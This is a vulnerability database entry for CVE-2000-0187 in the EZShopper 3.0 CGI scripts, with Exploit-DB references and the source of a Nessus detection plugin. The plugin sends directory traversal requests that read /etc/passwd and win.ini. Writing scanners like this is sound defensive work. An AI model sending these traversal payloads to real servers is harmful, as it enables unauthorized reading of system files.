Vulnerabilities > CVE-2000-0187 - Remote Command Execution vulnerability in Alex Heiphetz Group Ezshopper 3.0

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
alex-heiphetz-group
nessus
exploit available
NVD
Published: 2000-02-27
Updated: 2008-09-10

Summary

EZShopper 3.0 loadpage.cgi CGI script allows remote attackers to read arbitrary files via a .. (dot dot) attack or execute commands via shell metacharacters.

Vulnerable Configurations

Part Description Count
Application
Alex_Heiphetz_Group
1

Exploit-Db

  • descriptionEZshopper Directory Transversal in loadpage.cgi. CVE-2000-0187. Webapps exploit for cgi platform
    idEDB-ID:659
    last seen2016-01-31
    modified2004-11-25
    published2004-11-25
    reporterZero X
    sourcehttps://www.exploit-db.com/download/659/
    titleEZshopper - Directory Transversal loadpage.cgi
  • descriptionAlex Heiphetz Group EZShopper 3.0 Remote Command Execution. CVE-2000-0187 . Remote exploits for multiple platform
    idEDB-ID:19781
    last seen2016-02-02
    modified2000-02-27
    published2000-02-27
    reportersuid
    sourcehttps://www.exploit-db.com/download/19781/
    titleAlex Heiphetz Group EZShopper 3.0 - Remote Command Execution

Nessus

NASL familyCGI abuses
NASL idEZSHOPPER.NASL
descriptionThe version of EZShopper running on the remote host has multiple directory traversal vulnerabilities in loadpage.cgi and search.cgi. A remote attacker could exploit this to read sensitive information from the server. There is also an arbitrary command execution vulnerability in this version of EZShopper, though Nessus has not checked for that issue.
last seen2020-06-01
modified2020-06-02
plugin id10065
published2000-02-28
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10065
titleEZShopper Multiple Directory Traversal Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if(description)
{
 script_id(10065);
 script_version ("1.40");
 script_cve_id("CVE-2000-0187", "CVE-2000-0188");
 script_bugtraq_id(1014);
 
 script_name(english:"EZShopper Multiple Directory Traversal Vulnerabilities");
 script_summary(english:"Tries a directory traversal attack");

 script_set_attribute(attribute:"synopsis", value:
"A web application on the remote host has multiple directory traversal
vulnerabilities." );
 script_set_attribute(attribute:"description", value:
"The version of EZShopper running on the remote host has multiple
directory traversal vulnerabilities in loadpage.cgi and search.cgi.
A remote attacker could exploit this to read sensitive information
from the server.

There is also an arbitrary command execution vulnerability in this
version of EZShopper, though Nessus has not checked for that issue." );
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/bugtraq/2000/Feb/437"
 );
 script_set_attribute(
   attribute:"solution", 
   value:"Upgrade to the latest version of this software."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
 script_set_attribute(attribute:"plugin_publication_date", value: "2000/02/28");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/02/27");
 script_cvs_date("Date: 2018/11/15 20:50:17");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");

 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");

 script_dependencie("find_service1.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");

 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
 if(is_cgi_installed3(item:dir+"/loadpage.cgi", port:port))
 {
req = string(dir, "/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd");
rep = http_send_recv3(method:"GET", item:req, port:port);
if(isnull(rep)) exit(0);

if("root:" >< rep[2]){
      security_warning(port);
      exit(0);
      }


req2 = string(dir,"/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini");
rep2 = http_send_recv3(method:"GET", item:req2, port:port);
if(isnull(rep2)) exit(0);


if("[windows]" >< rep2[2]){
      security_warning(port);
      exit(0);
      }
 }

if(is_cgi_installed3(item:dir+"/search.cgi", port:port))
 {
req3 = string(dir,"/search.cgi?user_id=1&database=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&template=..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&distinct=1");
rep3 = http_send_recv3(method:"GET", item:req3, port:port);
if(isnull(rep3)) exit(0);

if("[windows]" >< rep3[2]){
      security_warning(port);
      exit(0);
      }


req4 = string(dir, "/loadpage.cgi?user_id=1&database=../../../../../../etc/passwd&template=../../../../../../../../../etc/passwd&distinct=1");
rep4 = http_send_recv3(method:"GET", item:req4, port:port);
if(isnull(rep4)) exit(0);

if("root:" >< rep4[2]){
      security_warning(port);
      exit(0);
      }
  }   
}

References